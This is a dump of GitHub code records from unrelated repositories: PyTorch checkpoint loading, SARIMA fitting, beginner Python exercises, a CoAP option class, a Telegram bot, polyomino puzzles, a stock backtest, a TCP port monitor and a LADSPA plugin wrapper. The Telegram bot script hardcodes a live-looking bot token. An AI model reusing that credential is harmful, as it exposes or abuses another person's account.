Loads TRAINING checkpoint. Including the model params and other training stats\n (optimizer, current epoch, etc.)\n\n :param path: Checkpoint path to be resumed\n \"\"\"\n resume_path = str(resume_path)\n self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n checkpoint = torch.load(resume_path)\n self.start_epoch = checkpoint['epoch'] + 1\n self.monitor_best = checkpoint['monitor_best']\n\n # load architecture params from checkpoint.\n if checkpoint['config']['arch'] != self.config['arch']:\n self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n \"checkpoint. This may yield an exception while state_dict is being loaded.\")\n missing_keys, unexpected_keys = self.model.load_state_dict(checkpoint['model'], strict=False)\n if len(missing_keys) > 0:\n self.logger.warning(f\"[WARNING] missing keys: {missing_keys}\")\n if len(unexpected_keys) > 0:\n self.logger.warning(f\"[WARNING] unexpected keys: {unexpected_keys}\")\n\n # load optimizer state from checkpoint only when optimizer type is not changed.\n if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n \"Optimizer parameters not being resumed.\")\n else:\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n # load lr_scheduler state from checkpoint only when lr_scheduler type is not changed.\n if checkpoint['config']['lr_scheduler']['type'] != self.config['lr_scheduler']['type']:\n self.logger.warning(\"Warning: lr_scheduler type given in config file is different from that of checkpoint. \"\n \"lr_scheduler parameters not being resumed.\")\n else:\n self.lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n self.logger.info(\"Checkpoint loaded. Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"mohammadasim98/human-pose-prediction-in-the-wild","sub_path":"src/trainers/base3d.py","file_name":"base3d.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2602029529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import poly\nfrom sympy.abc import B, a, b, c, d\nfrom scipy.optimize import minimize, basinhopping, brute, least_squares\n\nfrom sarima_plus_plus import sampleSeasonalARIMA, calculateSeasonalARIMA_error, \\\n calculateSeasonalARIMA_error_minimization_form_slow, \\\n SARIMA_error_squared, difference_series\n\nif __name__ == '__main__':\n p_poly = None\n q_poly = poly(1 - a * B, B) * poly(1 - b * B ** 4, B) * poly(1 - c * B ** 30, B)\n d_poly = poly(1 - B, B)\n\n q_symbols = [a, b, c]\n q_ARIMA_coeffs = [0.6, 0.2, 0.1]\n est_p_poly = None\n est_q_poly: poly = poly(q_poly.subs(dict(zip(q_symbols, q_ARIMA_coeffs))), B)\n\n y_t = sampleSeasonalARIMA(est_p_poly, d_poly, est_q_poly, 1, 1000)\n plt.plot(y_t, label=\"sampled ARIMA\", marker='x')\n\n a_t_error = calculateSeasonalARIMA_error(y_t, est_p_poly, d_poly, est_q_poly)\n plt.plot(a_t_error, label='sampled ARIMA error', marker='.', markevery=10)\n\n print(\"est_q_poly\", est_q_poly)\n print(\"Expected value of shock a_t\", np.mean(a_t_error))\n print(\"sd of shock a_t\", np.sqrt(np.var(a_t_error)))\n # remember: don't square error to determine the sd of a_t\n\n plt.legend()\n plt.show()\n ###################################################################\n\n myx0 = np.random.random(len(q_ARIMA_coeffs))\n myx0 /= np.sum(myx0)\n\n w_t = difference_series(y_t, d_poly)\n\n res = minimize(SARIMA_error_squared, x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n method='Nelder-Mead', options={'maxiter': 5000, 'disp': True})\n print(\"estimated params (via minimize):\", res.df)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n\n # warn: lm method does not allow bounds, therefore good initial guess is needed (?) (i.e. satisfying conditions like inveritibility)\n res = least_squares(calculateSeasonalARIMA_error_minimization_form_slow, bounds=(-2, 2), x0=myx0,\n args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n )\n print(\"estimated params (via least_squares):\", res.x)\n print(\"true params:\", q_ARIMA_coeffs)\n print(\"initial guess:\", myx0)\n","repo_name":"Irfan-Mu3/ai-ds-projects","sub_path":"time_series_analysis/time_series_funcs/spp_MA_test.py","file_name":"spp_MA_test.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39314756962","text":"# input\nname = str(input(\"Enter last name: \"))\ndependents = int(input(\"Enter the number of dependents: \"))\ngrossIncome = float(input(\"Enter gross income: $\"))\nagi = grossIncome-dependents*12000\n\n# process phase\nif agi > 50000:\n itr = 0.20\nelse:\n itr = 0.10\nincomeTax = agi*itr\nif incomeTax < 0:\n incomeTax = 100\n\n# output\nprint(name)\nprint(\"Gross income: $\", grossIncome)\nprint(\"Number of dependents: \", dependents)\nprint(\"Adjusted gross income: $\", agi)\nprint(\"Income tax: \", incomeTax)","repo_name":"katieserg/CIS106-Katie-Sergiyenko","sub_path":"PS3P5.py","file_name":"PS3P5.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12486999604","text":"import sys\nread = sys.stdin.readline\n\nn = int(read())\n\nif n <= 2 :\n print(n)\n exit()\n\ndp1 = [0, 1]\ndp2 = [1, 1]\n\nfor i in range(2, n) :\n c = []\n c.append(dp2[1]%15746)\n c.append((dp1[1]+dp2[1]%15746))\n #print(c)\n dp1 = dp2\n dp2 = c\n\nprint(sum(c)%15746)\n","repo_name":"HyunJungJo98/Algorithm-Study","sub_path":"DP/1904 - 01타일.py","file_name":"1904 - 01타일.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9655189","text":"from coapthon import defines\nfrom coapthon.utils import byte_len\n\n__author__ = 'Giacomo Tanganelli'\n\n\nclass Option(object):\n \"\"\"\n Class to handle the CoAP Options.\n \"\"\"\n def __init__(self):\n \"\"\"\n Data structure to store options.\n \"\"\"\n self._number = None\n self._value = None\n\n @property\n def number(self):\n \"\"\"\n Return the number of the option.\n\n :return: the option number\n \"\"\"\n return self._number\n\n @number.setter\n def number(self, value):\n \"\"\"\n Set the option number.\n\n :type value: int\n :param value: the option number\n \"\"\"\n self._number = value\n\n @property\n def value(self):\n \"\"\"\n Return the option value.\n\n :return: the option value in the correct format depending on the option\n \"\"\"\n if type(self._value) is None:\n self._value = bytearray()\n opt_type = defines.OptionRegistry.LIST[self._number].value_type\n if opt_type == defines.INTEGER:\n if byte_len(self._value) > 0:\n return int(self._value)\n else:\n return defines.OptionRegistry.LIST[self._number].default\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"\n Set the value of the option.\n\n :param value: the option value\n \"\"\"\n if type(value) is str:\n value = bytearray(value, \"utf-8\")\n elif type(value) is int and byte_len(value) != 0:\n value = value\n elif type(value) is int and byte_len(value) == 0:\n value = 0\n self._value = value\n\n @property\n def length(self):\n \"\"\"\n Return the value length\n\n :rtype : int\n \"\"\"\n if isinstance(self._value, int):\n return byte_len(self._value)\n if self._value is None:\n return 0\n return len(self._value)\n\n def is_safe(self):\n \"\"\"\n Check if the option is safe.\n\n :rtype : bool\n :return: True, if option is safe\n \"\"\"\n if self._number == defines.OptionRegistry.URI_HOST.number \\\n or self._number == defines.OptionRegistry.URI_PORT.number \\\n or self._number == defines.OptionRegistry.URI_PATH.number \\\n or self._number == defines.OptionRegistry.MAX_AGE.number \\\n or self._number == defines.OptionRegistry.URI_QUERY.number \\\n or self._number == defines.OptionRegistry.PROXY_URI.number \\\n or self._number == defines.OptionRegistry.PROXY_SCHEME.number:\n return False\n return True\n\n @property\n def name(self):\n \"\"\"\n Return option name.\n\n :rtype : String\n :return: the option name\n \"\"\"\n return defines.OptionRegistry.LIST[self._number].name\n\n def __str__(self):\n \"\"\"\n Return a string representing the option\n\n :rtype : String\n :return: a message with the option name and the value\n \"\"\"\n return self.name + \": \" + str(self.value) + \"\\n\"\n\n def __eq__(self, other):\n \"\"\"\n Return True if two option are equal\n\n :type other: Option\n :param other: the option to be compared against\n :rtype : Boolean\n :return: True, if option are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/messages/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"} +{"seq_id":"43360385154","text":"\n#This program calculate the numbers of students with while loop\n\n#the main function\ndef main():\n endProgram, totalScore, averageScores, score, number, counter = declareVariable()\n\n while endProgram == \"no\":\n declareVariable()\n number = getNumber()\n totalScore = getScores(number,totalScore)\n averageScores = getAverage(totalScore, number)\n printAverage(averageScores)\n endProgram = input(\"Do you want to end the program?(Enter no to process a new set of test score)\")\n\ndef declareVariable():\n endProgram = \"no\"\n totalScore = 0.0\n averageScores = 0.0\n score = 0\n number = 0\n counter = 1\n return endProgram, totalScore, averageScores, score, number, counter\n\ndef getNumber():\n number = int(input(\"How many students took the test\"))\n return number\n\ndef getScores(number,totalScore):\n counter = 1\n while counter <= number:\n score = int(input(\"Enter the score\"))\n totalScore += score\n counter += 1\n return totalScore\n\ndef getAverage(totalScore, number):\n averageScore = totalScore/number\n return averageScore\n\ndef printAverage(averageScores):\n print(\"The average Score is \", averageScores)\n#calls main\nmain()\n","repo_name":"ssd2192/Python","sub_path":"Total Students with While Loop.py","file_name":"Total Students with While Loop.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31744889754","text":"# Write a program that asks the user to enter an integer and prints two integers, root\n# and pwr, such that 0 < pwr < 6 and root**pwr is equal to the integer entered by the user. If no\n# such pair of integers exists, it should print a message to that effect.\n\n\nimport math\n\n\n\nnum = int(input(\"Enter an integer: \"))\nfound = False\n\n#set 0 < power < 6\nfor pwr in range(1,6):\n #found root with built func math.sqrt\n #root = round(num**(1/pwr))\n root = math.sqrt(num)\n #compare if root**power == num entered\n if root**pwr == num:\n found = True\n #if True print(root, power)\n print(f\"root = {root} and power = {pwr}\")\n print(f\"{root}^{pwr} = {num}\")\n\nif not found:\n print(\"No such pair of integers exists.\")\n\n###WHILE LOOP VERSION\n\n# num = int(input(\"Enter an integer: \"))\n# found = False\n# pwr = 2\n\n# while pwr < 6:\n# root = round(num**(1/pwr))\n# if root**pwr == num:\n# found = True\n# print(f\"{root}^{pwr} = {num}\")\n# pwr += 1\n\n# if not found:\n# print(\"No such pair of integers exists.\")\n\n\n","repo_name":"ShadrackAdom/Data-Science-SelfTaught-Learning-Path","sub_path":"OSSU/MIT-Intro-to-CS-Python/FingerExercise/rootpwr.py","file_name":"rootpwr.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21338834568","text":"from __future__ import unicode_literals\nimport youtube_dl\n\"\"\"\n# 仅下载视频\ntimes = int(input('输入要下载视频的数量:'))\nfor i in range(times):\n ydl_opts = {}\n ys_url = input(f'要下载{i+1}次的视频地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([ys_url])\n\"\"\"\n\n# 仅下载视频的音频\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ntimes = int(input('输入要下载音频的数量:'))\nfor i in range(times):\n y_url = input(f'要下载{i+1}次音频的视频的地址:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([y_url])\n","repo_name":"getcoden/python-practise","sub_path":"10 有趣的脚本小程序/Download视频及youtube视频中仅下载音频.py","file_name":"Download视频及youtube视频中仅下载音频.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23427646474","text":"from telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters, ConversationHandler\n\n\ndef start(updater: Update, context: CallbackContext): # Hardoyim bulish sharit\n updater.message.reply_text(\"Assalomu alakum \\n\\nIsmingizni kirting: ✍️\") # BU botga malumotni pirosta ekranga chiqarish\n # updater.message.text # Botga xabar junatsa qabul qiladi yani ushlob olish uchun\n return 2\n\n\ndef name(updater: Update, context: CallbackContext):\n name_my = updater.message.text\n updater.message.reply_text(\"Familiyangizni kiriting: ✍️\")\n\n return 3\n\n\ndef fname(updater: Update, context: CallbackContext):\n fname_my = updater.message.text\n updater.message.reply_text(\"Yoshingizni kiriting ✍️\")\n\n return 4\n\ndef danni(updater: Update, context: CallbackContext):\n danni_my = updater.message.text\n updater.message.reply_text(f\"Quyidagi ma'lumotlar tog'rimi?\\nISM:{start}\\nFAMILIYA:{name}\\nYOSH:{fname}\")\n return 5\n\ndef age(updater: Update, context: CallbackContext):\n go_to = [ # kinobka uchun uzgaruvchi\n [KeyboardButton(\"⬅️Oldinga\")]\n # KeyboardButton KInobka chiqarish () buni ichiga yozilgan malumot Knobkani ichiga yozlib qoladi\n ]\n # ReplyKeyboardMarkup -- BU kinobka uzgaruvchisini chaqirib beradi\n # resize_keyboard = True -- Kinobka razmer ni kechkena qilib beradi\n updater.message.reply_text(\"Keyingi bo'limga o'tilsinmi?\",\n reply_markup=ReplyKeyboardMarkup(go_to, resize_keyboard=True))\n age_my = updater.message.text\n\n return 6\n\n\ndef menu(updater: Update, context: CallbackContext):\n info_button = [\n [KeyboardButton(\"🍴 Menyu\")],\n [KeyboardButton(\"🛍 Mening buyurtmalarim\")],\n [KeyboardButton(\"✍️ Fikr bildirish\"), KeyboardButton(\"⚙️ Sozlamalar\")]\n ]\n updater.message.reply_text(\"Quydagilardan birini tanlang..\",\n reply_markup=ReplyKeyboardMarkup(info_button, resize_keyboard=True))\n\n return 1\n\n\ndef post_message(updater: Update, context: CallbackContext):\n button_end = [\n [KeyboardButton(\"⬅️ Ortga\")]\n ]\n msg = updater.message.text\n updater.message.reply_text(f\"{msg} buyrug'i bosildi\", reply_markup=ReplyKeyboardMarkup(button_end, resize_keyboard=True))\n\n return 7\n\n # return 2\n # updater.message.reply_text(f\"{msg} bo'limiga\")\n\n\ndef main():\n TOKENT = \"5132329633:AAGFHeFtlyJR4iHeWID7D7CloKzx4xO3AOQ\"\n\n updater = Updater(TOKENT)\n\n all_handler = ConversationHandler(\n entry_points=[CommandHandler(\"start\", start)],\n states={\n 1: [MessageHandler(Filters.text, post_message)],\n 2: [MessageHandler(Filters.text, name)],\n 3: [MessageHandler(Filters.text, fname)],\n 4: [MessageHandler(Filters.text, age)],\n 5: [MessageHandler(Filters.text, menu)], # bu def ni bajarish tartibi\n\n },\n fallbacks=[]\n )\n updater.dispatcher.add_handler(all_handler)\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"richkhandev/rasm.jpg","sub_path":"Bot_3.py","file_name":"Bot_3.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74058576090","text":"from puzzler.puzzles import polyominoes\nfrom puzzler.puzzles.polyominoes import (\n Polyominoes123456, OneSidedPolyominoes123456)\n\n\nclass Polyominoes123456Star(Polyominoes123456):\n\n \"\"\"\n Monomono, domino, & triominoes restricted to a central 3x3 square.\n\n Pentominoes & tetrominoes restricted to the middle ring, as per\n Polyominoes12345Diamond2.\n\n Hexominoes restricted to an outer ring.\n\n 4,579 unique solutions for the pentominoes & tetrominoes (outer ring).\n 6 unique solutions for the inner square.\n 8 relative orientations.\n Total unique solutions: 219,792.\n\n many solutions\n\n Design by `Jack Wetterer and Chris Patterson, with symmetry refinements by\n Darian Jenkins `__, extending Kadon's\n 'Poly-5' (gamepuzzles.com/polycub2.htm#P5).\n \"\"\"\n\n width = 27\n height = 29\n\n def coordinates(self):\n self.inner_square_coords = set(\n self.coordinates_rectangle(3, 3, offset=(12,13)))\n coords_5 = set(\n list(self.coordinates_diamond(7, offset=(7,8)))\n + list(self.coordinates_rectangle(15, 1, offset=(6, 14)))\n + list(self.coordinates_rectangle(1, 15, offset=(13, 7))))\n self.middle_ring_coords = coords_5 - set(self.inner_square_coords)\n coords_6 = set(\n list(self.coordinates_rectangle(27, 1, offset=(0, 14)))\n + list(self.coordinates_rectangle(1, 29, offset=(13, 0))))\n for i in range(6):\n coords_6.update(set(self.coordinates_rectangle(\n 23 - 4 * i, 3 + 4 * i, offset=(2 * i + 2, 13 - 2 * i))))\n self.outer_ring_coords = coords_6 - coords_5\n return sorted(coords_6)\n\n def customize_piece_data(self):\n self.piece_data['P06'][-1]['rotations'] = None\n self.piece_data['P06'][-1]['flips'] = None\n\n fixed_inner_pieces = True\n\n if fixed_inner_pieces:\n\n restrictions = {\n #name: [(aspect, offset), ...],\n 'O1': [(0, (13, 14))],\n 'I2': [(1, (13, 15))],\n 'I3': [(0, (12, 13))],\n 'V3': [(2, (13, 13))],\n 'I4': [(1, ( 6, 14))],\n 'L4': [(1, (13, 7))],\n 'O4': [(0, (16, 12))],\n 'T4': [(2, (11, 17))],\n 'Z4': [(1, ( 9, 16))],\n 'F': [(5, (11, 9))],\n 'I': [(0, (13, 17))],\n 'L': [(3, (11, 15))],\n 'N': [(6, ( 8, 14))],\n 'P': [(0, (14, 17))],\n 'T': [(0, (18, 13))],\n 'U': [(1, (15, 14))],\n 'V': [(3, (12, 10))],\n 'W': [(3, ( 8, 11))],\n 'X': [(0, (15, 15,))],\n 'Y': [(0, (15, 10))],\n 'Z': [(3, (10, 11))],\n }\n\n def build_matrix(self):\n self.build_restricted_matrix()\n\n else:\n\n def build_matrix(self):\n self.build_regular_matrix(\n (polyominoes.Monomino.piece_data.keys()\n + polyominoes.Domino.piece_data.keys()\n + sorted(polyominoes.Trominoes.piece_data.keys())),\n sorted(self.inner_square_coords))\n self.build_regular_matrix(\n (sorted(polyominoes.Tetrominoes.piece_data.keys())\n + sorted(polyominoes.Pentominoes.piece_data.keys())),\n sorted(self.middle_ring_coords))\n self.build_regular_matrix(\n sorted(polyominoes.Hexominoes.piece_data.keys()),\n sorted(self.outer_ring_coords))\n\n\nclass Polyominoes123456_23x13(Polyominoes123456):\n\n width = 23\n height = 13\n","repo_name":"bpasanek/puzzlecode","sub_path":"puzzler-tweaked/puzzler/puzzles/polyominoes123456.py","file_name":"polyominoes123456.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40065589768","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndef load_data(file_name):\n df = pd.read_csv(file_name)\n return df\n\ndef buy_n_sell(true_prices, pred_prices, balance=1000000):\n\n num_share = 0\n portfolio_values = list()\n\n long_pos = 1 # 1 long ; 0 short\n long_price = true_prices[0] # assume holding the stock at the beginning\n\n profits = list() # daily profit\n\n num_share = balance//long_price\n balance = balance-num_share*long_price\n\n for i in range(len(pred_prices)-1):\n if i == len(pred_prices)-2 and long_pos == 1:\n if pred_prices[i+1] >= true_prices[i]:\n profits.append(true_prices[i+1]-long_price) # sell on last day\n long_pos = 0\n balance = balance + true_prices[i + 1] * num_share\n portfolio_values.append(balance) # 2nd last day\n portfolio_values.append(balance) # last day\n num_share = 0\n break\n else: # i == len(pred_prices)-2 and pred_prices[i+1] < true_prices[i] and long_pos == 1:\n profits.append(true_prices[i]-long_price) # sell on the 2nd last day\n long_pos = 0\n balance = balance + num_share*true_prices[i]\n portfolio_values.append(balance)\n portfolio_values.append(balance)\n num_share = 0\n break\n if high_return(true_prices[i], pred_prices[i+1]) and long_pos == 0:\n long_pos = 1\n profits.append(0)\n long_price = true_prices[i]\n portfolio_values.append(balance)\n num_share = balance//long_price\n balance = balance-num_share*long_price\n elif high_return(true_prices[i], pred_prices[i+1]) != True and long_pos == 1:\n long_pos = 0\n profits.append(true_prices[i]-long_price)\n balance = balance + num_share*true_prices[i]\n num_share = 0\n portfolio_values.append(balance)\n elif low_return(true_prices[i], pred_prices[i+1]) and long_pos == 1:\n long_pos = 0\n balance += num_share*true_prices[i]\n portfolio_values.append(balance)\n num_share=0\n else:\n profits.append(0)\n portfolio_values.append(balance+num_share*true_prices[i])\n continue\n return portfolio_values\n\n\n\ndef high_return(true_price, pred_price):\n return pred_price >= true_price * 1.02 > 0 # if predicted price is 2% higher than current price\n\n\ndef low_return(true_price, pred_price):\n return true_price * 0.99 >= pred_price > 0\n\n\nfile_name = 'return_df.csv'\ndf = load_data(file_name)\n\ntrue_prices, pred_prices = df['true_prices'], df['pred_prices']\nbalance = 1000000\nportfolio_values = buy_n_sell(true_prices, pred_prices,balance)\nportfolio_values = [elem/balance for elem in portfolio_values]\ntrue_pct_change = [x/true_prices[0] for x in true_prices]\n\n# plotting\nplt.plot(true_pct_change, label=\"buy and hold\")\nplt.plot(portfolio_values, label='strategy')\nplt.legend()\nplt.show()\n\ntrue_returns = np.diff(true_prices)\npred_returns = np.diff(pred_prices)\nax= plt.figure()\nplt.plot(true_returns, label='true')\nplt.plot(pred_returns, label='predicted')\nplt.show()","repo_name":"ysong126/previous_repo","sub_path":"Time series LSTM/strategy_backtest.py","file_name":"strategy_backtest.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13402656694","text":"#Task 9_1\nn=0\nnl=0\nf=0\nwhile n<1 or n>100000:\n n=int(input())\nwhile nl>n or nl<1 or f==1:\n f=0\n print(f\"Vvedite cherz probel {n} chisel.\")\n l=list(map(int,input().split()))\n nl=len(l)\n l.sort()\n if len(l) > 0:\n if l[-1] > 2*10e9 or l[0] < -2*10e9:\n f=1\ntl = set(l)\nprint(len(tl))\n\n##Task 9_2\ntmp1 = set()\ntmp2 = set()\ntmp3 = set()\nprint(f\"Vvedite kol-vo tmp1 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp1\")\nfor i in range(n):\n tmp1.add(int(input()))\nprint(f\"Vvedite kol-vo tmp2 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp2\")\nfor i in range(n):\n tmp2.add(int(input()))\ntmp3=tmp2.intersection(tmp1)\nprint(len(tmp3))\n\n##Task 9_3\ntmp=set()\nl=list(map(int,input().split()))\nfor i in l:\n if i in tmp:\n print(f\"{i} YES\")\n else:\n print(f\"{i} NO\")\n tmp.add(i)","repo_name":"IgorKirilyuk/Python1","sub_path":"PythonApplication1/PythonApplication1/lesson_9.py","file_name":"lesson_9.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30077073517","text":"\"\"\"\r\n\n\nWrite a function that returns the most frequent character in a list of words.\n\n### Examples\n\n most_frequent_char([\"apple\", \"bandage\", \"yodel\", \"make\"])\n ➞ [\"a\", \"e\"]\n \n most_frequent_char([\"music\", \"madness\", \"maniac\", \"motion\"])\n ➞ [\"m\"]\n \n most_frequent_char([\"the\", \"hills\", \"are\", \"alive\", \"with\", \"the\", \"sound\", \"of\", \"music\"])\n ➞ [\"e\", \"h\", \"i\"]\n\n### Notes\n\n * If multiple characters tie for most frequent, list all of them in alphabetical order.\n * Words will be in lower case.\n\n\"\"\"\r\n\ndef most_frequent_char(lst):\n x = ''.join(lst)\n y = [x.count(i) for i in x]\n z = []\n for i in range(len(x)):\n if max(y) == y[i]:\n z.append(x[i])\n return sorted(list(set(z)))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KcD3bABvuryCfZAYv_10.py","file_name":"KcD3bABvuryCfZAYv_10.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23429131438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Yang'\n\nimport socket\nimport time\nimport json\nimport threadpool\n\nhostname=socket.gethostname()\n\nEntry = {\n \"Endpoint\": hostname,\n \"Timestamp\": int(time.time()),\n \"Step\": 60,\n }\n\n#端口超时时间默认设置为5秒\ndef check_tcp_port(kw, timeout=5):\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n address = (str(kw[\"host\"]), int(kw[\"port\"]))\n cs.settimeout(timeout)\n status = cs.connect_ex(address)\n cs.close()\n except Exception as e:\n return {\"status\": False, \"message\": str(e)}\n else:\n if status != 0:\n return {\"status\": False, \"message\": \"Connection %s:%s failed\" % (kw[\"host\"], kw[\"port\"])}\n else:\n return {\"status\": True, \"message\": \"OK\"}\n\ndef run_check(entry_list,host,port,metric_type):\n kw={\"host\": host,\"port\": port}\n status=check_tcp_port(kw=kw)\n if status['status'] == True:\n value=1\n else:\n value=0\n entry = Entry.copy()\n entry.update({\n \"CounterType\": \"GAUGE\",\n \"Metric\": \"tcp.status\",\n \"TAGS\": \"type={0},port={1}\".format(host,port),\n \"Value\": value\n })\n entry_list.append(entry)\n\ndef run_threadpool():\n args=[]\n #线程池预设为8,可以根据机器性能修改\n task_pool=threadpool.ThreadPool(8)\n for service in service_list:\n for host in service['ip']:\n args.append(([entry_list,host,service[\"port\"],service[\"name\"]],None))\n \n theads=threadpool.makeRequests(run_check,args)\n [task_pool.putRequest(req) for req in theads ]\n task_pool.wait()\n \n\nif __name__ == '__main__':\n entry_list = []\n service_list=[]\n #添加服务就按照下面的例子给service_list添加一个dict,\n service_list.append({ \n \"name\": \"zookeeper\" ,\n \"ip\": [\"192.168.1.100\",\"192.168.1.101\",\"192.168.1.102\"],\n \"port\": \"2181\"\n })\n \n service_list.append({\n \"name\": \"rabbitmq\" ,\n \"ip\": [\"192.168.1.103\",\"192.168.1.104\",\"192.168.1.105\"],\n \"port\": \"5672\"\n })\n\n run_threadpool()\n print(json.dumps(entry_list))\n","repo_name":"84372051/n9e_plugin","sub_path":"60_tcp-connect.py","file_name":"60_tcp-connect.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11677492350","text":"from ..processor import Processor\nfrom ..mfp_app import MFPApp\nfrom ..bang import Uninit\n\n\nclass Plugin(Processor):\n doc_tooltip_obj = \"LADSPA plugin host\"\n\n def __init__(self, init_type, init_args, patch, scope, name):\n initargs, kwargs = patch.parse_args(init_args)\n\n self.lib_name = None\n self.lib_index = None\n self.plug_info = None\n self.plug_name = None\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.dsp_inlets = []\n self.dsp_outlets = []\n self.inlet_map = {}\n\n if len(initargs):\n self.init_plugin(initargs[0])\n\n Processor.__init__(self, self.plug_inlets, self.plug_outlets, init_type, init_args,\n patch, scope, name)\n self.hot_inlets = list(range(self.plug_inlets))\n\n async def setup(self):\n await self.dsp_init(\n \"ladspa~\",\n lib_name=self.lib_name, lib_index=self.lib_index,\n plug_control=self.plug_control\n )\n\n def init_plugin(self, pname):\n\n pinfo = MFPApp().pluginfo.find(pname)\n self.plug_info = pinfo\n self.lib_name = pinfo.get(\"lib_name\")\n self.lib_index = pinfo.get(\"lib_index\")\n self.plug_name = pinfo.get(\"label\")\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.inlet_map = {}\n\n self.doc_tooltip_obj = (\n MFPApp().pluginfo.plugin_docstring(pinfo) or self.doc_tooltip_obj)\n self.doc_tooltip_inlet = []\n self.doc_tooltip_outlet = []\n\n portinfo = pinfo.get(\"ports\", [])\n\n for portnum, port in enumerate(portinfo):\n self.plug_control.append(0)\n d = port.get(\"descriptor\", 0)\n if d & MFPApp().pluginfo.LADSPA_PORT_INPUT:\n self.doc_tooltip_inlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_inlets.extend([self.plug_inlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.inlet_map[self.plug_inlets] = portnum\n self.plug_inlets += 1\n\n elif d & MFPApp().pluginfo.LADSPA_PORT_OUTPUT:\n self.doc_tooltip_outlet.append(MFPApp().pluginfo.port_docstring(port))\n if d & MFPApp().pluginfo.LADSPA_PORT_AUDIO:\n self.dsp_outlets.extend([self.plug_outlets])\n else:\n self.plug_control[portnum] = MFPApp().pluginfo.port_default(port)\n self.plug_outlets += 1\n\n async def trigger(self):\n for portnum, value in enumerate(self.inlets):\n if value is not Uninit:\n self.plug_control[self.inlet_map.get(portnum, 0)] = float(value)\n await self.dsp_setparam(\"plug_control\", self.plug_control)\n\n\ndef register():\n MFPApp().register(\"plugin~\", Plugin)\n","repo_name":"bgribble/mfp","sub_path":"mfp/builtins/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"32"} +{"seq_id":"22672714018","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom typing import Any, Tuple\nimport torch.autograd as autograd\nfrom torch.nn import ModuleList, ModuleDict\n\n\ndef batch_jacobian(func, input: torch.Tensor):\n assert len(input.size()) == 2\n return torch.stack([autograd.functional.jacobian(func, t) for t in input])\n\n\ndef tuple_jacobian(func, inputs: Tuple[torch.Tensor], batch_dim=0):\n # only support batch_size = 